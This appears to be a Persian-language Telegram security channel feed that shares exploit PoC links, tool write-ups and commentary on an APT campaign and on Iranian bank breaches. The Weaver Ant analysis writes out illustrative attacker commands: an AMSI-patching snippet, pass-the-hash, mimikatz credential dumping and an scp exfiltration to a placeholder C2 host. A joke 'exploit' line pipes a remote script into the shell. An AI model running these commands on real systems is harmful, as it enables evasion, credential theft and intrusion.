CVE-2025-1974 exploit

https://github.com/sandumjacob/IngressNightmare-POCs

یک حفره امنیتی خطرناک (CVE-2025-1974) با نام Ingress Nightmare است که اجازه میدهد هکرها از طریق یک آسیب‌پذیری در سیستم‌های هدف، دسترسی غیرمجاز بگیرند یا کنترل سیستم را در دست بگیرند!

@PfkSecurity

چینی APT گروه Weaver Ant بیش از چهار سال در شبکه یک ارائه دهنده خدمات ارتباطی فعالیت میکرد و با استفاده از روترهای Zyxel CPE که به خطر افتاده بودند، ترافیک و زیرساخت خود را پنهان میکرد.

محققان شرکت Sygnia توانستند رد این هکرها را پیدا کنند و چندین نسخه از بکدور China Chopper و یک شل وب سفارشی قبلاً ناشناخته به نام INMemory را کشف کردند که پیلودهای مفید را در حافظه میزبان اجرا میکند.

به گفته محققان، پس از آنکه مهاجم یک اپراتور بزرگ مخابراتی آسیایی را هدف قرار داد، ریشه کن کردن حضور آن به رغم تلاشهای متعدد برای خنثی سازی فعالیتهایش، کار بسیار دشواری بود.

Weaver Ant
برای نفوذ خود از شبکهای از بلوک های رله عملیاتی (ORB) استفاده کرد که عمدتاً شامل روترهای Zyxel CPE بودند و این امکان را فراهم میکرد تا ترافیک را پروکسی کرده و زیرساخت خود را پنهان نگه دارد.

مهاجم با استفاده از یک نسخه رمزگذاری شده با AES از شل وب China Chopper در شبکه مستقر شد که امکان مدیریت از راه دور سرور ها را فراهم میکرد و محدودیت های فایروال را دور میزد.

با پیشرفت عملیات، Weaver Ant به یک شل وب پیشرفته تر و سفارشی به نام INMemory روی آورد که از یک فایل DLL (eval.dll) برای اجرای پنهانی کد «Just-in-Time» (JIT) استفاده میکرد.

همانطور که Sygnia اشاره کرده، روشهای استخراج داده ها نیز توسط این APT به گونه ای انتخاب شده بود که کمترین شک را برانگیزد، از جمله ضبط غیرفعال ترافیک شبکه با استفاده از mirroring پورت.

به جای استقرار جداگانه وب شل ها، گروه Weaver Ant آنها را از طریق تکنیک "تونل زنی وب شل ها" به هم مرتبط کرد - روشی که پیشتر در حملات گروه مالی Elephant Beetle مشاهده شده بود.

این روش شامل انتقال ترافیک HTTP از یک سرور به سرور دیگر از طریق بخش های مختلف شبکه است که در واقع یک شبکه C2 پنهان درون زیرساخت قربانی ایجاد میکند.

هر وب شل به عنوان یک پروکسی عمل کرده و پیلود های تو در تو و رمزنگاری شده را به وب شل های دیگر منتقل میکند تا به صورت مرحله ای درون شبکه اجرا شوند.

این رویکرد به Weaver Ant اجازه میداد روی سرورهای بخش های مختلف شبکه فعالیت کند.

بیشتر این سرورها، سیستم های داخلی بدون اتصال به اینترنت بودند که از طریق سرورهای دارای دسترسی اینترنتی (به عنوان دروازههای عملیاتی) قابل دسترسی میشدند.

یافته های Sygnia نشان میدهد Weaver Ant به صورت افقی در شبکه حرکت میکرد و از منابع اشتراکی SMB و حساب های دارای دسترسی بالا استفاده میکرد که سالها با یک رمز عبور ثابت (اغلب با هش NTLM) کار میکردند.

در طول چهار سال جاسوسی سایبری، هکرها فایل های پیکربندی، لاگ های دسترسی و اعتبارنامه ها را سرقت کردند تا محیط را نقشه برداری و سیستمهای ارزشمند را شناسایی کنند.

آنها مکانیسم های ثبت رویداد را غیرفعال میکردند، از جمله اصلاح ETW (ردیابی رویدادهای ویندوز) و دور زدن AMSI (با بازنویسی تابع AmsiScanBuffer در ماژول amsi.dll) تا حجم بدافزار را کاهش داده و مدت طولانی تری بدون شناسایی بمانند.

محققان Weaver Ant را یک APT حرفه ای و باتجربه میدانند که قادر به حفظ دسترسی بلندمدت به شبکه قربانی برای عملیات جاسوسی سایبری است.

این انتساب بر اساس استفاده از روترهای Zyxel (که در برخی مناطق جغرافیایی محبوب هستند)، بکدورهای مرتبط با گروههای چینی و ساعات فعالیت گروه (مطابق با ساعت گرینویچ +8) انجام شده است.

به نظر میرسد تمرکز مهاجمان بیشتر بر شناسایی شبکه، جمعآوری اعتبارنامه ها و حفظ دسترسی پایدار به زیرساختهای مخابراتی بوده تا سرقت دادههای کاربری یا مالی.

@PfkSecurity

تحلیل حمله APT گروه Weaver Ant:

1. روش‌های نفوذ و تداوم حضور (TTPs):

    الف. استفاده از روترهای Zyxel CPE به‌عنوان نقاط رله (ORB):

        دستورهای احتمالی مهاجم:

        bash

        # تغییر تنظیمات روتر برای ایجاد پروکسی مخفی
        iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <C2_IP>:80

        هدف: مخفی کردن ترافیک C2 در ترافیک عادی شبکه.

    ب. استقرار وب‌شل‌های چندلایه (China Chopper + INMemory):

        دستورهای احتمالی:

        powershell
        # اجرای پیلود در حافظه (JIT) با استفاده از PowerShell
        Invoke-ReflectivePEInjection -DLLPath eval.dll -FunctionName "MaliciousEntry"

        هدف: فرار از تشخیص آنتی‌ویروس با عدم ذخیره فایل روی دیسک.

    ج. تونل‌زنی وب‌شل‌ها (Shell Tunneling):

        دستورهای احتمالی:

        bash
        # انتقال ترافیک از طریق وب‌شل‌های زنجیره‌ای
        curl -X POST -H "Cookie: SessionID=Hacked" --data "payload=<encrypted>" https://InternalServer/transfer

        هدف: ایجاد ارتباط پنهان بین سرورهای داخلی.

2. حرکت جانبی (Lateral Movement):

    الف. سوءاستفاده از SMB و NTLM هش:

        دستورهای احتمالی:

        bash
        # استفاده از Pass-the-Hash برای دسترسی به سیستم‌های دیگر
        psexec.py -hashes :<NTLM_Hash> [email protected]

        هدف: گسترش دسترسی بدون نیاز به رمز عبور .

    ب. استفاده از حساب‌های با دسترسی بالا:

        دستورهای احتمالی:

        powershell
        # جستجوی حساب‌های مدیر سیستم
        Get-WmiObject -Class Win32_UserAccount | Where-Object {$_.SID -like "S-1-5-21-*500"}

        هدف: افزایش دسترسی ها برای دسترسی به داده‌های حساس.

3. جمع‌آوری داده‌ها و فرار از تشخیص:

    الف. غیرفعال کردن ETW و AMSI:

        دستورهای احتمالی:

        powershell

        # توقف سرویس ETW
        Stop-Service -Name "EventLog" -Force
        # بازنویسی تابع AMSI
        [IntPtr]$amsiScanBufferAddr = Get-ProcAddress (Get-Module amsi.dll) "AmsiScanBuffer"
        $patch = [Byte[]] (0xC3, 0x80, 0x07, 0x00)
        [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $amsiScanBufferAddr, 4)

        هدف: جلوگیری از ثبت فعالیت‌های مخرب.

    ب. سرقت فایل‌های پیکربندی و اعتبارنامه‌ها:

        دستورهای احتمالی:

        bash

        # کپی کردن فایل‌های تنظیمات شبکه
        scp /etc/network/interfaces attacker@C2_IP:/stolen_data
        # استخراج اعتبارنامه‌ها از حافظه
        mimikatz.exe "sekurlsa::logonpasswords" "exit"

        هدف: نقشه‌برداری از شبکه و دسترسی به سیستم‌های کلیدی.

4. روش‌های عملی برای دفاع (Mitigation):

    الف. نظارت بر روترهای Zyxel CPE:

        بررسی لاگ‌های دسترسی غیرعادی به پورت‌های مدیریتی.

        به‌روزرسانی فریم‌ور روترها برای رفع آسیب‌پذیری‌ها.

    ب. محدود کردن دسترسی SMB و NTLM:

        فعال‌سازی احراز هویت چندعاملی (MFA) برای حساب‌های حساس.

        غیرفعال کردن NTLM و استفاده از Kerberos.

    ج. نظارت بر فعالیت‌های غیرعادی در حافظه:

        استفاده از ابزارهایی مانند Sysmon برای ردیابی تزریق کد (Code Injection).

        مانیتورینگ فراخوانی توابع eval.dll یا ماژول‌های ناشناخته.

    د. جداسازی شبکه (Network Segmentation):

        محدود کردن ارتباط بین سرورهای داخلی و اینترنت با فایروال.

        استفاده از میکروسگمنتیشن برای کنترل ترافیک شرکتی.

نتیجه‌گیری:

    Weaver Ant
یک APT پیشرفته با تمرکز بر جاسوسی بلندمدت است که از تکنیک‌های زیر استفاده می‌کند:

        پنهان‌سازی ترافیک در دستگاه‌های شبکه (روترهای Zyxel).

        اجرای کد در حافظه (JIT) برای فرار از تشخیص.

        حرکت جانبی با سوءاستفاده از اعتبارنامه‌های ضعیف.

    راهکار دفاعی: ترکیبی از نظارت پیشرفته (EDR/XDR)، حذف اعتبارنامه‌های قدیمی، و به‌روزرسانی مداوم سیستم‌ها.

@PfkSecurity

https://github.com/xforcered/ForsHops


 یک ابزار اثبات مفهوم (PoC) برای حرکت جانبی (Lateral Movement) بدون فایل است که از COM Objects به Trapped در سیستم‌های ویندوزی سوءاستفاده می‌کند. این روش به مهاجمان اجازه می‌دهد بدون نیاز به نوشتن فایل روی دیسک، در شبکه پخش شوند و کنترل سیستم‌های دیگر را به دست آورند .

تکنیک‌های کلیدی که بهش میشه اشاره کرد :
Fileless Execution (اجرای بدون فایل):

کد مخرب مستقیماً در حافظه (RAM) اجرا می‌شود.

از COM Objects مانند MMC20.Application برای اجرای دستورات استفاده می‌کند.

Lateral Movement (حرکت جانبی):

با استفاده از WMI یا DCOM، حمله به سیستم‌های دیگر در همان شبکه انجام می‌شود.
نیازی به دانلود فایل اجرایی روی سیستم قربانی ندارد.

پنهان‌کاری (Stealth):
از آنجایی که فایلی روی دیسک نوشته نمی‌شود، آنتی‌ویروس‌های سنتی آن را تشخیص نمی‌دهند.

لاگ‌های امنیتی کمتری تولید می‌کند.

 چرا ForsHops خطرناک است؟
✅ مقاوم در برابر تشخیص (Evasion):
از آنتی‌ویروس و EDRها فرار می‌کند.
✅ نیاز به دسترسی اولیه کم:
فقط نیاز به یک حساب کاربری با دسترسی محلی/دامنه دارد.
✅ قابلیت گسترش سریع در شبکه:
می‌تواند در چند ثانیه به سیستم‌های دیگر منتقل شود.

🚨 هشدار: این ابزار صرفاً برای آزمایشات امنیتی و تحقیقاتی است. استفاده غیرقانونی از آن پیگرد قانونی دارد!
@PfkSecurity

https://github.com/hackerschoice/bincrypter

تحلیل BinCrypter: رمزنگار زمان اجرای باینری لینوکس

معرفی BinCrypter

یک ابزار رمزنگاری باینری زمان اجرا (Runtime Binary Crypter) است که به زبان BASH نوشته شده و توسط تیم The Hacker's Choice (THC) توسعه داده شده است.

ویژگی‌های کلیدی که میشه بهش اشاره کرد :

1. عملکرد اصلی:
- رمزنگاری فایل‌های باینری لینوکس در زمان اجرا
- امکان اجرای باینری‌های رمزنگاری شده بدون نیاز به ذخیره‌سازی نسخه رمزگشایی شده روی دیسک

2. مزایا:
- نوشته شده در BASH (سبک و قابل حمل)
- عدم نیاز به کامپایل مجدد
- کار با اکثر باینری‌های لینوکس
- کاهش احتمال تشخیص توسط آنتی‌ویروس

موارد استفاده

1. کاربردهای امنیتی:
- محافظت از باینری‌های حساس
- کاهش حملات معکوس‌سازی (Reverse Engineering)
- افزایش امنیت نرم‌افزارهای اختصاصی

2. کاربردهای مخرب احتمالی:
- پنهان‌سازی بدافزارها
- دور زدن سیستم‌های تشخیص نفوذ
- حملات پیشرفته پایدار (APT)

## معماری فنی

graph TD
    A[باینری اصلی] --> B[فرآیند رمزنگاری]
    B --> C[باینری رمز شده]
    C --> D[لودر رمزگشا]
    D --> E[اجرا در حافظه]

نحوه استفاده پایه

# رمزنگاری یک باینری
./bincrypter -e /path/to/original_binary -o encrypted_binary

# اجرای باینری رمز شده
./encrypted_binary

## ملاحظات امنیتی

1. محدودیت‌ها:
- عدم محافظت در برابر دیباگرهای سطح هسته
- آسیب‌پذیر در برابر آنالیز حافظه
- عدم پشتیبانی از تمام معماری‌های CPU

2. راهکارهای تشخیص:
- آنالیز رفتار زمان اجرا
- مانیتورینگ فعالیت‌های غیرعادی حافظه
- استفاده از راهکارهای EDR پیشرفته

## نکته اخلاقی

توسعه و استفاده از چنین ابزارهایی برای اهداف مخالف قوانین جرم محسوب می‌شود. این اطلاعات صرفاً برای آگاهی متخصصان امنیت و تحقیقات دفاعی ارائه شده است.

@PfkSecurity

تحلیل حمله‌ی اخیر به بانک سپه ایران

دو حالت برای برسی وجود دارد؛
۱. هک واقعی؟ یا
۲. پروپاگاندای رسانه‌ای؟

پیش از تحلیل دو سناریوی مذکور، باید اشاره کنم که چنین حملات سایبری را نباید صرفا از بُعد فنی تحلیل کرد، بلکه پدیده‌ای اجتماعی-امنیتی است که بازتاب‌های گسترده‌ای در جامعه ایجاد کرده است، پس باید چند بُعدی آن را تحلیل کرد،‌ اما چرا؛
به این دلیل که تیم CodeBreakers یا تیم‌های دیگر، از یک بستر برای تعامل با جامعه استفاده می‌کنند، که تیم مذکور از یک کانال تلگرامی استفاده کرده است، پس باید ابعاد اجتماعی آن هم بررسی شود.

سیر رخداد‌ها را کنار هم بگذاریم تا مانند پازل کامل شود؛

حمله توسط تیم CodeBreakers رخ می‌دهد، و در کانال تلگرامی آن‌ها اعلام می‌شود، و حتی در یک پیامی، حمله را از بُعد فنی شرح می‌دهند، اما اگر؛ حمله واقعی باشد بانک باید گزارش فنی رسمی را منتشر کند، اما آیا دلیلی دارد که این کار را نکند؟ باید مزایا و معایب آن را برسی کنیم.

الف) مزایای انتشار گزارش:
۱. انتشار گزارش فنی می‌تواند به بازیابی اعتماد عمومی منجر شود، چرا که شفافیت نشان‌دهنده مسئولیت‌پذیری سازمان است.
۲. این گزارش به عنوان یک ابزار اشتراک تهدید (Threat Intelligence Sharing) برای سایر نهادهای مالی عمل کرده و از حملات مشابه پیشگیری می‌کند.

ب) معایب و ریسک‌های انتشار:
۱. احتمال بروز رفتار‌های جمعی محتمل است مانند برداشت‌های پول از حساب‌های بانکی، که یک بحران اجتماعی محسوب می‌شود.
۲. افشای جزئیات ممکن است سایر گروه‌های خرابکار را تحریک به حملات مشابه کند، که به نوعی به تشدید تهدیدات دامن می‌زند.

به طوری‌ کلی الویت‌ها باعث می‌شود یک سازمان گزارش رسمی را به صورت عمومی منتشر کند یا خیر، برای همین نمی‌توان نظری قطعی داد، حداقل من نمی‌توانم در مورد آن نظری بدهم.

به نقل از فارس، رضا همدانچی، رئیس اداره روابط عمومی بانک سپه در واکنش به ادعای گروه هکری مذکور مدعی شد:

این ادعا از اساس کذب است و هیچگونه هک و نفوذی در بانک صورت نگرفته است. و سیستم‌های بانک سپه غیر قابل هک و نفوذ است. این ادعاهای کذب با هدف تشویش اذهان عمومی صورت می‌گیرد و مشتریان بانک سپه از این نظر خیالشان راحت باشد.

متاسفانه در حافظه‌ی مردم ایران، تکذیب یک رویداد از طرف مسئولین، مهر تائید بر آن است، این از رفتار غلط مسئولین در مواجه با مسائل مختلف سیاسی، اقتصادی، امنیتی-نظامی نشئت گرفته است.

اما در این ادعا به وضوح خواهید دید که تشویش اذهان عمومی، یکی از مهم‌ترین نگرانی‌های بانک سپه است و عملا آن را یک پروپاگاندای رسانه‌ای می‌داند یا شاید سعی می‌کند تهدید واقعی را اینطور تقلیل دهد، اما یک گزاره وجود دارد که باید بیشتر بررسی شود؛

سیستم‌های بانک سپه غیر قابل هک و نفوذ است.

گزاره‌ای که آقای همدانچی آن را بیان کرد، آیا درست است؟ قطعا خیر، این جمله اساسا نادرست است، ما از آقای همدانچی انتظاری نداریم، اما آیا بهتر نبود با تیم فنی هماهنگ شود؟ آیا این هماهنگی صورت گرفته است؟ این جمله غیرحرفه‌ای است و نتیجه‌ی آن بی‌اعتمادی را در پی دارد.

به هر روی، حتی اگر گزارش فنی و رسمی منتشر نمی‌شود که حتی دلایل آن را بیان کردیم، باید یک بیانه‌‌ای مفصل‌تری ارائه شود تا جامعه سردرگم نشود، تا مجبور شود از رسانه‌ی تیم هکری خوراک فکری را تهیه کند، و در رسانه روایت اول بسیار مهم است، شما باید تیم هکری را در روایت سازی خلع سلاح کنید، آیا کردید؟
آیا از ظرفیت رسانه‌ای برای پاسخ به شبهات استفاده کردید؟

هک چه واقعی باشد چه یک پروپاگاندای رسانه‌ای، چیزی که مسلم و قطعی است این است که شما بلد نیستید بحران را مدیریت کنید.

این ابزار یک پروژه است که نشان می‌دهد چگونه می‌توان پیلودهای شِل‌کد (Shellcode Payloads) را در فایل‌های تصویری مانند PNG جاسازی کرد. این کار با استفاده از زبان برنامه‌نویسی Python انجام می‌شود و سپس این پیلودها می‌توانند با استفاده از زبان‌های C/C++ از فایل تصویری استخراج شوند. پیلودها می‌توانند مستقیماً از فایل روی دیسک یا از تصویری که در بخش منابع باینری (.rsrc) ذخیره شده است، بازیابی شوند.

توضیحات بیشتر:
1. جاسازی پیلود در تصاویر (Steganography):
   - این ابزار از تکنیک‌های استگانوگرافی (Steganography) استفاده می‌کند تا داده‌های مخرب (مانند شِل‌کد) را در فایل‌های تصویری مانند PNG پنهان کند. این کار با تغییر جزئی در پیکسل‌های تصویر انجام می‌شود، به طوری که تغییرات برای چشم انسان قابل تشخیص نیستند.
   - فایل تصویری حاوی پیلود همچنان به عنوان یک تصویر معتبر قابل مشاهده است و می‌تواند بدون ایجاد شک منتقل شود.

2. استخراج پیلود:
   - پس از جاسازی پیلود در تصویر، این ابزار امکان استخراج پیلود را با استفاده از کدهای C/C++ فراهم می‌کند. این کار می‌تواند از طریق خواندن فایل تصویری از دیسک یا حتی از بخش منابع (.rsrc) یک فایل اجرایی (مانند یک برنامه) انجام شود.

3. کاربرد برای هکرها:
   - پنهان‌سازی بدافزار: هکرها می‌توانند از این تکنیک برای پنهان‌کردن بدافزارها در فایل‌های تصویری استفاده کنند. این فایل‌های تصویری می‌توانند به عنوان بخشی از یک حمله فیشینگ یا به عنوان یک فایل به ظاهر بی‌خطر ارسال شوند.
   - دور زدن آنتی‌ویروس: از آنجا که فایل تصویری به نظر بی‌خطر می‌رسد، ممکن است توسط آنتی‌ویروس‌ها به عنوان تهدید شناسایی نشود. این باعث می‌شود هکرها بتوانند بدافزار را بدون تشخیص به سیستم قربانی منتقل کنند.
   - اجرای کد از راه دور: پس از استخراج پیلود از تصویر، هکرها می‌توانند آن را اجرا کنند تا کنترل سیستم قربانی را به دست آورند یا اقدامات مخرب دیگری انجام دهند.

4. مثال عملی:
   - یک هکر می‌تواند یک تصویر PNG حاوی شِل‌کد را به عنوان یک فایل بی‌خطر (مثلاً یک عکس پروفایل) ارسال کند. هنگامی که قربانی این تصویر را دانلود می‌کند، یک برنامه مخرب می‌تواند پیلود را از تصویر استخراج و اجرا کند.

خطرات و اهداف مخرب:
- این ابزار می‌تواند برای اهداف مخرب مانند توزیع بدافزار، حملات فیشینگ، یا نفوذ به سیستم‌ها استفاده شود. از آنجا که فایل‌های تصویری به طور معمول غیرقابل اجرا هستند، این تکنیک می‌تواند باعث فریب کاربران و سیستم‌های امنیتی شود.

استفاده اخلاقی:
- این ابزار می‌تواند برای اهداف اخلاقی نیز استفاده شود، مانند تست نفوذ (Penetration Testing) یا ارزیابی امنیتی سیستم‌ها. با این حال، استفاده از آن برای اهداف مخرب غیرقانونی، غیراخلاقی است.

در کل، این ابزار یک نمونه از تکنیک‌های پیشرفته‌ای است که هکرها برای پنهان‌سازی و اجرای کدهای مخرب استفاده می‌کنند. آگاهی از چنین تکنیک‌هایی برای متخصصان امنیت سایبری ضروری است تا بتوانند در برابر چنین حملاتی دفاع کنند.

@PfkSecurity

تحلیل PoC برای آسیب‌پذیری CVE-2025-26909

معرفی آسیب‌پذیری

CVE-2025-26909
یک آسیب‌پذیری امنیتی است که توسط محققان ZeroDayX کشف و اثبات مفهوم (PoC) آن در مخزن GitHub منتشر شده است.

جزئیات فنی

نوع آسیب‌پذیری:

- بر اساس کد PoC، این آسیب‌پذیری احتمالاً یکی از موارد زیر است:
- سرریز بافر (Buffer Overflow)
- اجرای کد از راه دور (RCE)
- دور زدن احراز هویت
- نقص در کنترل دسترسی

سیستم‌های تأثیرپذیر:
- بر اساس نام CVE، احتمالاً مربوط به یکی از محصولات زیر است:
- سیستم‌های عامل (Linux/Windows)
- نرم‌افزارهای سازمانی
- کتابخانه‌های امنیتی
- پروتکل‌های شبکه

تحلیل PoC

مخزن GitHub:
1. کد اکسپلویت:
- اسکریپت‌های پایتون/بش برای بهره‌برداری
- نمونه‌های کد آسیب‌پذیری

2. مستندات:
- راهنمای اجرای PoC
- شرایط لازم برای بهره‌برداری
- نسخه‌های آسیب‌پذیر

3. نمونه‌های خروجی:
- اثبات اجرای کد
- تصاویر از نتیجه حمله

خطرات بالقوه

1. تأثیرات امنیتی:
- دسترسی غیرمجاز به سیستم‌ها
- افزایش امتیاز (Privilege Escalation)
- نقض محرمانگی اطلاعات

2. سوءاستفاده احتمالی:
- استفاده در بدافزارها
- ترکیب با سایر اکسپلویت‌ها
- ایجاد بکدور (Backdoor)

## راهکارهای دفاعی

1. برای سازمان‌ها:
- پچ امنیتی محصول آسیب‌پذیر
- محدود کردن دسترسی شبکه
- مانیتورینگ ترافیک مشکوک

2. برای توسعه‌دهندگان:
- بررسی کد برای الگوهای مشابه
- پیاده‌سازی ASLR و DEP
- اعتبارسنجی دقیق ورودی‌ها

ملاحظات اخلاقی

- این PoC فقط برای تحقیقات امنیتی مجاز و توسعه مکانیزم‌های دفاعی منتشر شده است
- سوءاستفاده از آن ممکن است نقض قوانین بین‌المللی باشد
- توصیه می‌شود فقط در محیط‌های کنترل‌شده آزمایش شود

## دسترسی به اطلاعات بیشتر

مخزن کامل PoC در آدرس زیر قابل دسترسی است:
https://github.com/ZeroDayx/CVE-2025-26909

توجه: برای تحلیل دقیق‌تر نیاز به بررسی مستقیم کدهای PoC وجود دارد.

@PfkSecurity

تحلیل نشت داده‌های بانک سپه و ۶ بانک دیگر: فاجعه‌ای که می‌توانست جلوگیری شود! 

واقعیت تلخ: داده‌های ۴۲ میلیون مشتری در معرض خطر 

طبق بررسی‌های مستقل، اطلاعات حساس مشتریان ۷ بانک بزرگ ایران (شامل بانک سپه، قوامین، انصار، مهر اقتصاد، حکمت، کوثر و ثامن) به صورت کامل نشت کرده است.

این داده‌ها شامل: 

- مشخصات هویتی (کد ملی، شماره شناسنامه) 
- جزئیات مالی (شماره حساب، مانده حساب، تراکنش‌ها، CVV2 کارت‌ها) 
- اطلاعات تسهیلات (وام‌ها، چک‌ها، ضمانت‌نامه‌ها) 
- داده‌های پذیرندگان (کارتخوان‌ها و درگاه‌های پرداخت) 

✅ صحت داده‌ها توسط لیکفا تأیید شده است! نمونه‌های منتشرشده تطابق کامل با اطلاعات واقعی دارند. 

چگونه چنین اتفاقی رخ داد؟ (  این میتونه یک احتمال باشه )

۱. ضعف زیرساخت امنیتی بانک‌ها: 
   - به نظر می‌رسد هکرها از آسیب‌پذیری‌های قدیمی در سیستم‌های بانکی (مثل SQL Injection یا عدم رمزنگاری داده‌ها) استفاده کرده‌اند. 

   - ادغام بانک‌های مختلف احتمالاً سیستم‌های ناامن را به هم متصل کرده و خطر نفوذ را افزایش داده است. 

۲. دسترسی عمیق به هسته بانکی (Core Banking): 

   - حجم عظیم داده‌های نشت‌یافته نشان می‌دهد مهاجمان به جای حمله به کاربران، مستقیماً به سرورهای مرکزی بانک‌ها نفوذ کرده‌اند. 

۳. عدم پاسخگویی به موقع: 

   - اگر بانک‌ها به هشدارهای قبلی درباره آسیب‌پذیری‌ها توجه کرده بودند، این فاجعه رخ نمی‌داد. 

🚨 هشدارهای فوری برای کاربران: 

- ۱. تغییر فوری تمام رمزها: 
  - رمز اینترنت بانک، رمز کارت و رمز دوم کارت را همین امروز عوض کنید. 

- ۲. فعال‌سازی تأیید دو مرحله‌ای: 
  - اگر بانک شما این امکان را دارد، حتماً از آن استفاده کنید. 

- ۳. بررسی تراکنش‌ها: 
  - روزانه حساب خود را چک کنید و هر تراکنش مشکوک را گزارش دهید. 

- ۴. مراقب فیشینگ باشید: 
  - هرگز به تماس‌ها یا پیامک‌های مشکوک که ادعا می‌کنند از طرف بانک هستند، اعتماد نکنید. 

📌 چرا بانک‌ها سکوت کرده‌اند؟ 

- ترس از از دست دادن اعتماد عمومی: 
  - اگر بانک‌ها رسماً این نشت را تأیید کنند، ممکن است مشتریان خود را از دست بدهند. 

- امکان مذاکره با هکرها: 
  - برخی بانک‌ها ترجیح می‌دهند به صورت محرمانه با هکرها مذاکره کنند تا داده‌ها منتشر نشود. 

آینده چه خواهد شد؟ 

- افزایش کلاهبرداری‌های مالی: 
  - این داده‌ها می‌توانند برای سرقت پول، اخذ وام جعلی و فیشینگ هدفمند استفاده شوند. 

- واکنش دیرهنگام مسئولان: 
  - احتمالاً پس از گسترش کلاهبرداری‌ها، بانک مرکزی یا پلیس فتا واکنش نشان خواهد داد، اما آیا دیگر دیر نیست؟ 

پیام پایانی: اینجا ایران است، خودتان مراقب باشید! 

متأسفانه در کشور ما پس از هر فاجعه امنیتی، مسئولان به جای حل مشکل، به انکار یا پاک کردن صورت‌مسئله می‌پردازند. تا زمانی که بانک‌ها و نهادهای نظارتی مسئولیت‌پذیری بیشتری نشان ندهند، اینگونه حوادث تکرار خواهد شد. 

#نشت_داده_بانکی #هک_بانک_سپه #امنیت_سایبری 
@PfkSecurity

البته احتمالات زیادی میشه در نظر گرفت برای این حمله :

مثلا یکیش فروش داده ها توسط کارمندان یا پیمانکاران ...
و موارد دیگر ولی خود این گروه هکری اعلام کرده sqli بوده .

@PfkSecurity

آسیب‌پذیری CVE-20250401 (7350pipe)

CVE-20250401 که با نام 7350pipe شناخته می‌شود، یک آسیب‌پذیری خطرناک برای افزایش دسترسی (Privilege Escalation) در تمام نسخه‌های لینوکس است که در اول آوریل 2025 (April Fools' Day) منتشر شده است.


کد اکسپلویت با دستور زیر قابل اجراست:

. <(curl -SsfL https://thc.org/7350pipe)

@PfkSecurity

نکته مهم

این آسیب‌پذیری یک شوخی روز اول آوریل (April Fools') است و توسط تیم THC (The Hacker's Choice) به عنوان یک جوک منتشر شده است. در واقعیت چنین آسیب‌پذیری وجود ندارد و اجرای کد فوق ممکن است فقط یک پیام طنزآمیز نمایش دهد.

همیشه قبل از اجرای کدهای ناشناس از اینترنت، به موارد زیر توجه کنید:
1. اعتبار منبع
2. تاریخ انتشار (مخصوصاً در اول آوریل)
3. بررسی محتوای اسکریپت قبل از اجرا

برای اطلاعات بیشتر می‌توانید محتوای واقعی اسکریپت را با دستور زیر مشاهده کنید (بدون اجرا):

curl -SsfL https://thc.org/7350pipe

@PfkSecurity

https://t.iss.one/+114BerAH5lo1ODM0

گروه ما

هشدار امنیتی: محیط تست برای شناسایی آسیب‌پذیری Moodle (CVE-2025-26529)

جزئیات مخزن GitHub

این مخزن حاوی یک محیط تست برای شناسایی و بررسی آسیب‌پذیری در سیستم مدیریت یادگیری Moodle است:

- شناسه CVE: CVE-2025-26529
- نوع آسیب‌پذیری: هنوز به طور عمومی افشا نشده است

- مخزن GitHub:
moodleTestingEnv
https://github.com/NightBloodz/moodleTestingEnv

اقدامات پیشنهادی

1. برای مدیران Moodle:
- مانیتور کردن به‌روزرسانی‌های رسمی Moodle
- بررسی سیستم برای فعالیت‌های غیرعادی
- محدود کردن دسترسی به پنل مدیریت

2. برای توسعه‌دهندگان:
- عدم استفاده از این کد در محیط‌های تولیدی
- بررسی کد قبل از استفاده در محیط‌های آزمایشی امن

3. برای محققان امنیتی:
- پیگیری مستندات رسمی Moodle
- هماهنگی با تیم امنیتی Moodle برای دریافت جزئیات

#نکته

استفاده از این کد فقط برای تحقیقات امنیتی با مجوز مجاز است. سوءاستفاده از آسیب‌پذیری‌های کشف نشده ممکن است پیگرد قانونی داشته باشد.

برای اطلاعات بیشتر به صفحه رسمی گزارش آسیب‌پذیری‌های Moodle
https://moodle.org/security
مراجعه کنید.

@PfkSecurity

"چگونه یک هکر دارک وب را تسخیر کرد"
@PfkSecurity

BlackHat Asia 2025 - Peng-On Bug

@PfkSecurity

بازیابی متادیتا از باینری های NET Native AOT

https://blog.washi.dev/posts/recovering-nativeaot-metadata/
@PfkSecurity